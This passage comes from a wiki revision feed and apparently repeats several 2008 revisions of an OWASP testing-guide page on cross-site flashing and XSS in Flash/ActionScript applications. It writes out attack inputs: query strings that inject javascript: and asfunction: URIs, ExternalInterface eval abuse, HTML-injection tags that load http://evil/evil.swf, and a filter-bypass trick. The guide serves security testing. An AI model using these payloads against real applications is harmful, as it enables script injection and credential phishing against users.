they can be potentially decompiled and analysed.&lt;br /&gt;
The most known and free ActionScript 2.0 decompiler is flare.&lt;br /&gt;
&lt;br /&gt;
To decompile a swf file with flare just type:&lt;br /&gt;
&lt;br /&gt;
 $ flare hello.swf&lt;br /&gt;
&lt;br /&gt;
it will result in a new file called hello.flr.&lt;br /&gt;
&lt;br /&gt;
Decompilation helps testers in the process of testing because it&lt;br /&gt;
moves black box to white box.&lt;br /&gt;
&lt;br /&gt;
There's no free decompiler for ActionScript 3.0 at the moment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Undefined Variables ===&lt;br /&gt;
&lt;br /&gt;
On actionscript 2 entry points are retrieved by looking at every undefined attribute &lt;br /&gt;
beloging to _root and _global objects, since Actionscript 2 behaves as every member &lt;br /&gt;
belonging to _root or _global objects were instantiable by &lt;br /&gt;
url querystring parameters. That means that if an attribute like:&lt;br /&gt;
&lt;br /&gt;
 _root.varname &lt;br /&gt;
&lt;br /&gt;
results &amp;quot;undefined&amp;quot; at some point of code flow, it could be overwritten by setting&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 http://victim/file.swf?varname=value&lt;br /&gt;
&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  movieClip 328 __Packages.Locale {&lt;br /&gt;
&lt;br /&gt;
    #initclip&lt;br /&gt;
      if (!_global.Locale) {&lt;br /&gt;
        var v1 = function (on_load) {&lt;br /&gt;
          var v5 = new XML();&lt;br /&gt;
          var v6 = this;&lt;br /&gt;
          v5.onLoad = function (success) {&lt;br /&gt;
            if (success) {&lt;br /&gt;
              trace('Locale loaded xml');&lt;br /&gt;
              var v3 = this.xliff.file.body.$trans_unit;&lt;br /&gt;
              var v2 = 0;&lt;br /&gt;
              while (v2 &amp;lt; v3.length) {&lt;br /&gt;
                Locale.strings[v3[v2]._resname] = v3[v2].source.__text;&lt;br /&gt;
                ++v2;&lt;br /&gt;
              }&lt;br /&gt;
              on_load();&lt;br /&gt;
            } else {}&lt;br /&gt;
          };&lt;br /&gt;
          if (_root.language != undefined) {&lt;br /&gt;
            Locale.DEFAULT_LANG = _root.language;&lt;br /&gt;
          }&lt;br /&gt;
          v5.load(Locale.DEFAULT_LANG + '/player_' +&lt;br /&gt;
                              Locale.DEFAULT_LANG + '.xml');&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Could be attacked by requesting:&lt;br /&gt;
&lt;br /&gt;
 http://victim/file.swf?language=http://evil&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Unsafe Methods ===&lt;br /&gt;
&lt;br /&gt;
When an entry point is identified the data it represents could be used by unsafe methods.&lt;br /&gt;
If the data is not filtered/validated using the right regexp it could lead to some security issue.&lt;br /&gt;
&lt;br /&gt;
Unsafe Methods since version r47 are:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
loadVariables()&lt;br /&gt;
loadMovie()&lt;br /&gt;
getURL()&lt;br /&gt;
loadMovie()&lt;br /&gt;
loadMovieNum()&lt;br /&gt;
FScrollPane.loadScrollContent()&lt;br /&gt;
LoadVars.load &lt;br /&gt;
LoadVars.send &lt;br /&gt;
XML.load ( 'url' )&lt;br /&gt;
LoadVars.load ( 'url' ) &lt;br /&gt;
Sound.loadSound( 'url' , isStreaming ); &lt;br /&gt;
NetStream.play( 'url' );&lt;br /&gt;
&lt;br /&gt;
flash.external.ExternalInterface.call(_root.callback)&lt;br /&gt;
&lt;br /&gt;
htmlText&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== The Test ===&lt;br /&gt;
&lt;br /&gt;
In order to exploit a vulnerability the swf file should be hosted on the victim host, and&lt;br /&gt;
the techniques of reflected Xss must be used.&lt;br /&gt;
That is forcing the browser to load a pure swf file directly in the location bar &lt;br /&gt;
( by redirection or social engineering) or by loading it through an iframe from an evil page:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;iframe src='http://victim/path/to/file.swf'&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is because in this situation the browser will self generate a Html page as if it were hosted &lt;br /&gt;
by the victim host.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Xss ===&lt;br /&gt;
&lt;br /&gt;
'''GetURL:'''&lt;br /&gt;
&lt;br /&gt;
GetURL Function lets the movie to load a URI into Browser's Window. &lt;br /&gt;
So if an undefined variable is used as first argument for getURL:&lt;br /&gt;
&lt;br /&gt;
 getURL(_root.URI,'_targetFrame');&lt;br /&gt;
&lt;br /&gt;
This means it's possible to call javascript in the same domain where the movie is hosted by &lt;br /&gt;
requesting:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 http://victim/file.swf?URI=javascript:evilcode&lt;br /&gt;
&lt;br /&gt;
 getURL('javascript:evilcode','_self');&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The same when only some part of getURL is controlled:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 Dom Injection with Flash javascript injection&lt;br /&gt;
 &lt;br /&gt;
	getUrl('javascript:function('+_root.arg+')) &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''asfunction:'''&lt;br /&gt;
&lt;br /&gt;
&amp;quot;You can use the special asfunction protocol to cause &lt;br /&gt;
 the link to execute an ActionScript function in a SWF file &lt;br /&gt;
 instead of opening a URL...&amp;quot; ( Adobe.com )&lt;br /&gt;
&lt;br /&gt;
Until release r48 of Flash player asfunction could be used on every method which has a url&lt;br /&gt;
as argument.&lt;br /&gt;
&lt;br /&gt;
This means that a tester could try to inject:&lt;br /&gt;
&lt;br /&gt;
 asfunction:getURL,javascript:evilcode&lt;br /&gt;
&lt;br /&gt;
in every unsafe method like:&lt;br /&gt;
&lt;br /&gt;
 loadMovie(_root.URL)&lt;br /&gt;
&lt;br /&gt;
by requesting:&lt;br /&gt;
&lt;br /&gt;
 http://victim/file.swf?URL=asfunction:getURL,javascript:evilcode&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''ExternalInterface:'''&lt;br /&gt;
&lt;br /&gt;
ExternalInterface.call is a static method introduced by adobe to improve player/browser interaction.&lt;br /&gt;
&lt;br /&gt;
From a security point of view it could be abused when part of its argument could be controlled:&lt;br /&gt;
&lt;br /&gt;
 flash.external.ExternalInterface.call(_root.callback);&lt;br /&gt;
 &lt;br /&gt;
the attack pattern for this kind of flaw should be something like the following:&lt;br /&gt;
eval(evilcode)&lt;br /&gt;
&lt;br /&gt;
since the internal javascript which is executed by the browser will be something similar to:&lt;br /&gt;
&lt;br /&gt;
 eval('try { __flash__toXML('+__root.callback+') ; } catch (e) { &amp;quot;&amp;lt;undefined/&amp;gt;&amp;quot;; }')&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Html Injection ===&lt;br /&gt;
&lt;br /&gt;
TextField Objects can render minimal Html by setting:&lt;br /&gt;
&lt;br /&gt;
 tf.html = true&lt;br /&gt;
 tf.htmlText = '&amp;lt;tag&amp;gt;text&amp;lt;/tag&amp;gt;'&lt;br /&gt;
&lt;br /&gt;
So if some part of text could be controlled by the tester, an a tag or a img tag could be &lt;br /&gt;
injected resulting in modifying the GUI or Xss the browser.&lt;br /&gt;
&lt;br /&gt;
Some Attack Example with A Tag:&lt;br /&gt;
&lt;br /&gt;
* Direct XSS: &amp;lt;a href='javascript:alert(123)' &amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Call AS function: &amp;lt;a href='asfunction:function,arg' &amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Call Swf public functions: &lt;br /&gt;
    &amp;lt;a href='asfunction:_root.obj.function, arg'&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Call Native Static AS Function:&lt;br /&gt;
&amp;lt;a href='asfunction:System.Security.allowDomain,evilhost' &amp;gt;&lt;br /&gt;
&lt;br /&gt;
Img tag could be used as well:&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;img src='http://evil/evil.swf' &amp;gt;&lt;br /&gt;
* &amp;lt;img src='javascript:evilcode//.swf' &amp;gt; (.swf is necessary to bypass flash player internal filter)&lt;br /&gt;
&lt;br /&gt;
Note: since release 124 of Flash player Xss is no more exploitable, but GUI modification could still &lt;br /&gt;
be accomplished.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Flashing ===&lt;br /&gt;
&lt;br /&gt;
Cross Site Flashing (XSF) is a vulnerability which has a similar impact than with Xss.&lt;br /&gt;
&lt;br /&gt;
XSF Occurs when from different domains:&lt;br /&gt;
&lt;br /&gt;
* One Movie loads another Movie with loadMovie* functions or other hacks and has access to the same sandbox or part of it&lt;br /&gt;
* XSF could also occurs when an HTML page uses JavaScript to command a Macromedia Flash movie, for example, by calling:&lt;br /&gt;
** GetVariable: access to flash public and static object from javascript as a string.&lt;br /&gt;
** SetVariable: set a static or public flash object to a new  string value from javascript. &lt;br /&gt;
* Unexpected Browser to swf communication could result in stealing data from swf application.&lt;br /&gt;
&lt;br /&gt;
It could be perfomed by forcing a flawed swf to load an external evil flash file.&lt;br /&gt;
&lt;br /&gt;
This attack could result in Xss or in the modification of the GUI in order to fool a user to &lt;br /&gt;
insert credentials on a fake flash form.&lt;br /&gt;
&lt;br /&gt;
XSF could be used in presence of Flash Html Injection or external swf files when loadMovie*&lt;br /&gt;
methods are used.&lt;br /&gt;
&lt;br /&gt;
=== Attacks and Flash Player Version ===&lt;br /&gt;
&lt;br /&gt;
Since May 2007 three new versions of Flash player were released by Adobe.&lt;br /&gt;
Every new version restricts some of the attacks previously described.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
| Attack         | asfunction | ExternalInterface | GetURL  | Html Injection | &lt;br /&gt;
| Player Version |&lt;br /&gt;
| v9.0 r47/48    |  Yes       |   Yes             | Yes     |     Yes        |&lt;br /&gt;
| v9.0 r115      |  No        |   Yes             | Yes     |     Yes        |&lt;br /&gt;
| v9.0 r124      |  No        |   Yes             | Yes     |     Partially  |&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cross Site Scripting and Cross Site Flashing are the expected results on a flawed SWF file.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Testing Flash Applications: A new attack vector for XSS and XSFlashing: http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt&lt;br /&gt;
&lt;br /&gt;
* Finding Vulnerabilities in Flash Applications: http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt&lt;br /&gt;
&lt;br /&gt;
* Adobe Security: http://www.adobe.com/devnet/flashplayer/articles/flash_player9_security_update.html&lt;br /&gt;
&lt;br /&gt;
* Securing SWF Applications: http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html&lt;br /&gt;
&lt;br /&gt;
* The Flash Player Development Center Security Section: http://www.adobe.com/devnet/flashplayer/security.html&lt;br /&gt;
&lt;br /&gt;
* The Flash Player 9.0 Security Whitepaper: http://www.adobe.com/devnet/flashplayer/articles/flash_player_9_security.pdf&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* SWFIntruder: https://www.owasp.org/index.php/Category:SWFIntruder&lt;br /&gt;
&lt;br /&gt;
* Decompiler – Flare: http://www.nowrap.de/flare.html&lt;br /&gt;
&lt;br /&gt;
* Compiler – MTASC: &amp;lt;http://www.mtasc.org/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Disassembler – Flasm: &amp;lt;http://flasm.sourceforge.net/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Swfmill – Convert Swf to XML and vice versa: &amp;lt;http://swfmill.org/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Debugger Version of Flash Plugin/Player: &amp;lt;http://www.adobe.com/support/flash/downloads.html&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_flashing_(OTG-CLIENT-008)&amp;diff=38852</id>
		<title>Testing for Cross site flashing (OTG-CLIENT-008)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_flashing_(OTG-CLIENT-008)&amp;diff=38852"/>
				<updated>2008-09-08T13:06:29Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Cross Site Flashing */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
ActionScript is the language, based on ECMAScript, used by Flash application when dealing with&lt;br /&gt;
interactive needs. &lt;br /&gt;
ActionScript, like every other language, has some implementation pattern which could lead to &lt;br /&gt;
security issues.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
In particular, since Flash application are often embedded in browsers, vulnerabilities like DOM based Cross Site Scripting could be present in flawed Flash applications.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Since the first publication of &amp;quot;Testing Flash Applications&amp;quot; [1], new versions of Flash player &lt;br /&gt;
were released in order to mitigate some of the attacks which will be described.&lt;br /&gt;
Nevertheless some issue still remains exploitable because it strongly depends on developer unsecure&lt;br /&gt;
programming practices.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example ==&lt;br /&gt;
&lt;br /&gt;
=== Decompilation ===&lt;br /&gt;
&lt;br /&gt;
Since SWF files are interpreted by a virtual machine embedded in the player itself, &lt;br /&gt;
they can be potentially decompiled and analysed.&lt;br /&gt;
The most known and free ActionScript 2.0 decompiler is flare.&lt;br /&gt;
&lt;br /&gt;
To decompile a swf file with flare just type:&lt;br /&gt;
&lt;br /&gt;
 $ flare hello.swf&lt;br /&gt;
&lt;br /&gt;
it will result in a new file called hello.flr.&lt;br /&gt;
&lt;br /&gt;
Decompilation helps testers in the process of testing because it&lt;br /&gt;
moves black box to white box.&lt;br /&gt;
&lt;br /&gt;
There's no free decompiler for ActionScript 3.0 at the moment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Undefined Variables ===&lt;br /&gt;
&lt;br /&gt;
On actionscript 2 entry points are retrieved by looking at every undefined attribute &lt;br /&gt;
beloging to _root and _global objects, since Actionscript 2 behaves as every member &lt;br /&gt;
belonging to _root or _global objects were instantiable by &lt;br /&gt;
url querystring parameters. That means that if an attribute like:&lt;br /&gt;
&lt;br /&gt;
 _root.varname &lt;br /&gt;
&lt;br /&gt;
results &amp;quot;undefined&amp;quot; at some point of code flow, it could be overwritten by setting&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 http://victim/file.swf?varname=value&lt;br /&gt;
&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  movieClip 328 __Packages.Locale {&lt;br /&gt;
&lt;br /&gt;
    #initclip&lt;br /&gt;
      if (!_global.Locale) {&lt;br /&gt;
        var v1 = function (on_load) {&lt;br /&gt;
          var v5 = new XML();&lt;br /&gt;
          var v6 = this;&lt;br /&gt;
          v5.onLoad = function (success) {&lt;br /&gt;
            if (success) {&lt;br /&gt;
              trace('Locale loaded xml');&lt;br /&gt;
              var v3 = this.xliff.file.body.$trans_unit;&lt;br /&gt;
              var v2 = 0;&lt;br /&gt;
              while (v2 &amp;lt; v3.length) {&lt;br /&gt;
                Locale.strings[v3[v2]._resname] = v3[v2].source.__text;&lt;br /&gt;
                ++v2;&lt;br /&gt;
              }&lt;br /&gt;
              on_load();&lt;br /&gt;
            } else {}&lt;br /&gt;
          };&lt;br /&gt;
          if (_root.language != undefined) {&lt;br /&gt;
            Locale.DEFAULT_LANG = _root.language;&lt;br /&gt;
          }&lt;br /&gt;
          v5.load(Locale.DEFAULT_LANG + '/player_' +&lt;br /&gt;
                              Locale.DEFAULT_LANG + '.xml');&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Could be attacked by requesting:&lt;br /&gt;
&lt;br /&gt;
 http://victim/file.swf?language=http://evil&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Unsafe Methods ===&lt;br /&gt;
&lt;br /&gt;
When an entry point is identified the data it represents could be used by unsafe methods.&lt;br /&gt;
If the data is not filtered/validated using the right regexp it could lead to some security issue.&lt;br /&gt;
&lt;br /&gt;
Unsafe Methods since version r47 are:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
loadVariables()&lt;br /&gt;
loadMovie()&lt;br /&gt;
getURL()&lt;br /&gt;
loadMovie()&lt;br /&gt;
loadMovieNum()&lt;br /&gt;
FScrollPane.loadScrollContent()&lt;br /&gt;
LoadVars.load &lt;br /&gt;
LoadVars.send &lt;br /&gt;
XML.load ( 'url' )&lt;br /&gt;
LoadVars.load ( 'url' ) &lt;br /&gt;
Sound.loadSound( 'url' , isStreaming ); &lt;br /&gt;
NetStream.play( 'url' );&lt;br /&gt;
&lt;br /&gt;
flash.external.ExternalInterface.call(_root.callback)&lt;br /&gt;
&lt;br /&gt;
htmlText&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== The Test ===&lt;br /&gt;
&lt;br /&gt;
In order to exploit a vulnerability the swf file should be hosted on the victim host, and&lt;br /&gt;
the techniques of reflected Xss must be used.&lt;br /&gt;
That is forcing the browser to load a pure swf file directly in the location bar &lt;br /&gt;
( by redirection or social engineering) or by loading it through an iframe from an evil page:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;iframe src='http://victim/path/to/file.swf'&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is because in this situation the browser will self generate a Html page as if it were hosted &lt;br /&gt;
by the victim host.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Xss ===&lt;br /&gt;
&lt;br /&gt;
'''GetURL:'''&lt;br /&gt;
&lt;br /&gt;
GetURL Function lets the movie to load a URI into Browser's Window. &lt;br /&gt;
So if an undefined variable is used as first argument for getURL:&lt;br /&gt;
&lt;br /&gt;
 getURL(_root.URI,'_targetFrame');&lt;br /&gt;
&lt;br /&gt;
This means it's possible to call javascript in the same domain where the movie is hosted by &lt;br /&gt;
requesting:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 http://victim/file.swf?URI=javascript:evilcode&lt;br /&gt;
&lt;br /&gt;
 getURL('javascript:evilcode','_self');&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The same when only some part of getURL is controlled:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 Dom Injection with Flash javascript injection&lt;br /&gt;
 &lt;br /&gt;
	getUrl('javascript:function('+_root.arg+')) &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''asfunction:'''&lt;br /&gt;
&lt;br /&gt;
&amp;quot;You can use the special asfunction protocol to cause &lt;br /&gt;
 the link to execute an ActionScript function in a SWF file &lt;br /&gt;
 instead of opening a URL...&amp;quot; ( Adobe.com )&lt;br /&gt;
&lt;br /&gt;
Until release r48 of Flash player asfunction could be used on every method which has a url&lt;br /&gt;
as argument.&lt;br /&gt;
&lt;br /&gt;
This means that a tester could try to inject:&lt;br /&gt;
&lt;br /&gt;
 asfunction:getURL,javascript:evilcode&lt;br /&gt;
&lt;br /&gt;
in every unsafe method like:&lt;br /&gt;
&lt;br /&gt;
 loadMovie(_root.URL)&lt;br /&gt;
&lt;br /&gt;
by requesting:&lt;br /&gt;
&lt;br /&gt;
 http://victim/file.swf?URL=asfunction:getURL,javascript:evilcode&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''ExternalInterface:'''&lt;br /&gt;
&lt;br /&gt;
ExternalInterface.call is a static method introduced by adobe to improve player/browser interaction.&lt;br /&gt;
&lt;br /&gt;
From a security point of view it could be abused when part of its argument could be controlled:&lt;br /&gt;
&lt;br /&gt;
 flash.external.ExternalInterface.call(_root.callback);&lt;br /&gt;
 &lt;br /&gt;
the attack pattern for this kind of flaw should be something like the following:&lt;br /&gt;
eval(evilcode)&lt;br /&gt;
&lt;br /&gt;
since the internal javascript which is executed by the browser will be something similar to:&lt;br /&gt;
&lt;br /&gt;
 eval('try { __flash__toXML('+__root.callback+') ; } catch (e) { &amp;quot;&amp;lt;undefined/&amp;gt;&amp;quot;; }')&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Html Injection ===&lt;br /&gt;
&lt;br /&gt;
TextField Objects can render minimal Html by setting:&lt;br /&gt;
&lt;br /&gt;
 tf.html = true&lt;br /&gt;
 tf.htmlText = '&amp;lt;tag&amp;gt;text&amp;lt;/tag&amp;gt;'&lt;br /&gt;
&lt;br /&gt;
So if some part of text could be controlled by the tester, an a tag or a img tag could be &lt;br /&gt;
injected resulting in modifying the GUI or Xss the browser.&lt;br /&gt;
&lt;br /&gt;
Some Attack Example with A Tag:&lt;br /&gt;
&lt;br /&gt;
* Direct XSS: &amp;lt;a href='javascript:alert(123)' &amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Call AS function: &amp;lt;a href='asfunction:function,arg' &amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Call Swf public functions: &lt;br /&gt;
    &amp;lt;a href='asfunction:_root.obj.function, arg'&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Call Native Static AS Function:&lt;br /&gt;
&amp;lt;a href='asfunction:System.Security.allowDomain,evilhost' &amp;gt;&lt;br /&gt;
&lt;br /&gt;
Img tag could be used as well:&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;img src='http://evil/evil.swf' &amp;gt;&lt;br /&gt;
* &amp;lt;img src='javascript:evilcode//.swf' &amp;gt; (.swf is necessary to bypass flash player internal filter)&lt;br /&gt;
&lt;br /&gt;
Note: since release 124 of Flash player Xss is no more exploitable, but GUI modification could still &lt;br /&gt;
be accomplished.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Flashing ===&lt;br /&gt;
&lt;br /&gt;
Cross Site Flashing (XSF) is a vulnerability which has a similar impact than with Xss.&lt;br /&gt;
XSF Occurs when from different domains:&lt;br /&gt;
One Movie loads another Movie with loadMovie* functions &lt;br /&gt;
or other hacks and has access to the same sandbox or part of it&lt;br /&gt;
XSF could also occurs when an HTML page uses JavaScript&lt;br /&gt;
to command a Macromedia Flash movie, for example, by calling:&lt;br /&gt;
&lt;br /&gt;
* GetVariable: access to flash public and static object from javascript as a string.&lt;br /&gt;
* SetVariable: set a static or public flash object to a new  string value from javascript. &lt;br /&gt;
* Unexpected Browser to swf communication could result in stealing data from swf application.&lt;br /&gt;
&lt;br /&gt;
It could be perfomed by forcing a flawed swf to load an external evil flash file.&lt;br /&gt;
&lt;br /&gt;
This attack could result in Xss or in the modification of the GUI in order to fool a user to &lt;br /&gt;
insert credentials on a fake flash form.&lt;br /&gt;
&lt;br /&gt;
XSF could be used in presence of Flash Html Injection or external swf files when loadMovie*&lt;br /&gt;
methods are used.&lt;br /&gt;
&lt;br /&gt;
=== Attacks and Flash Player Version ===&lt;br /&gt;
&lt;br /&gt;
Since May 2007 three new versions of Flash player were released by Adobe.&lt;br /&gt;
Every new version restricts some of the attacks previously described.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
| Attack         | asfunction | ExternalInterface | GetURL  | Html Injection | &lt;br /&gt;
| Player Version |&lt;br /&gt;
| v9.0 r47/48    |  Yes       |   Yes             | Yes     |     Yes        |&lt;br /&gt;
| v9.0 r115      |  No        |   Yes             | Yes     |     Yes        |&lt;br /&gt;
| v9.0 r124      |  No        |   Yes             | Yes     |     Partially  |&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cross Site Scripting and Cross Site Flashing are the expected results on a flawed SWF file.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Testing Flash Applications: A new attack vector for XSS and XSFlashing: http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt&lt;br /&gt;
&lt;br /&gt;
* Finding Vulnerabilities in Flash Applications: http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt&lt;br /&gt;
&lt;br /&gt;
* Adobe Security: http://www.adobe.com/devnet/flashplayer/articles/flash_player9_security_update.html&lt;br /&gt;
&lt;br /&gt;
* Securing SWF Applications: http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html&lt;br /&gt;
&lt;br /&gt;
* The Flash Player Development Center Security Section: http://www.adobe.com/devnet/flashplayer/security.html&lt;br /&gt;
&lt;br /&gt;
* The Flash Player 9.0 Security Whitepaper: http://www.adobe.com/devnet/flashplayer/articles/flash_player_9_security.pdf&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* SWFIntruder: https://www.owasp.org/index.php/Category:SWFIntruder&lt;br /&gt;
&lt;br /&gt;
* Decompiler – Flare: http://www.nowrap.de/flare.html&lt;br /&gt;
&lt;br /&gt;
* Compiler – MTASC: &amp;lt;http://www.mtasc.org/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Disassembler – Flasm: &amp;lt;http://flasm.sourceforge.net/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Swfmill – Convert Swf to XML and vice versa: &amp;lt;http://swfmill.org/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Debugger Version of Flash Plugin/Player: &amp;lt;http://www.adobe.com/support/flash/downloads.html&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_flashing_(OTG-CLIENT-008)&amp;diff=38851</id>
		<title>Testing for Cross site flashing (OTG-CLIENT-008)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_flashing_(OTG-CLIENT-008)&amp;diff=38851"/>
				<updated>2008-09-08T13:03:25Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Brief Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
ActionScript is the language, based on ECMAScript, used by Flash application when dealing with&lt;br /&gt;
interactive needs. &lt;br /&gt;
ActionScript, like every other language, has some implementation pattern which could lead to &lt;br /&gt;
security issues.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
In particular, since Flash application are often embedded in browsers, vulnerabilities like DOM based Cross Site Scripting could be present in flawed Flash applications.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Since the first publication of &amp;quot;Testing Flash Applications&amp;quot; [1], new versions of Flash player &lt;br /&gt;
were released in order to mitigate some of the attacks which will be described.&lt;br /&gt;
Nevertheless some issue still remains exploitable because it strongly depends on developer unsecure&lt;br /&gt;
programming practices.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example ==&lt;br /&gt;
&lt;br /&gt;
=== Decompilation ===&lt;br /&gt;
&lt;br /&gt;
Since SWF files are interpreted by a virtual machine embedded in the player itself, &lt;br /&gt;
they can be potentially decompiled and analysed.&lt;br /&gt;
The most known and free ActionScript 2.0 decompiler is flare.&lt;br /&gt;
&lt;br /&gt;
To decompile a swf file with flare just type:&lt;br /&gt;
&lt;br /&gt;
 $ flare hello.swf&lt;br /&gt;
&lt;br /&gt;
it will result in a new file called hello.flr.&lt;br /&gt;
&lt;br /&gt;
Decompilation helps testers in the process of testing because it&lt;br /&gt;
moves black box to white box.&lt;br /&gt;
&lt;br /&gt;
There's no free decompiler for ActionScript 3.0 at the moment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Undefined Variables ===&lt;br /&gt;
&lt;br /&gt;
On actionscript 2 entry points are retrieved by looking at every undefined attribute &lt;br /&gt;
beloging to _root and _global objects, since Actionscript 2 behaves as every member &lt;br /&gt;
belonging to _root or _global objects were instantiable by &lt;br /&gt;
url querystring parameters. That means that if an attribute like:&lt;br /&gt;
&lt;br /&gt;
 _root.varname &lt;br /&gt;
&lt;br /&gt;
results &amp;quot;undefined&amp;quot; at some point of code flow, it could be overwritten by setting&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 http://victim/file.swf?varname=value&lt;br /&gt;
&lt;br /&gt;
Example:&lt;br /&gt;
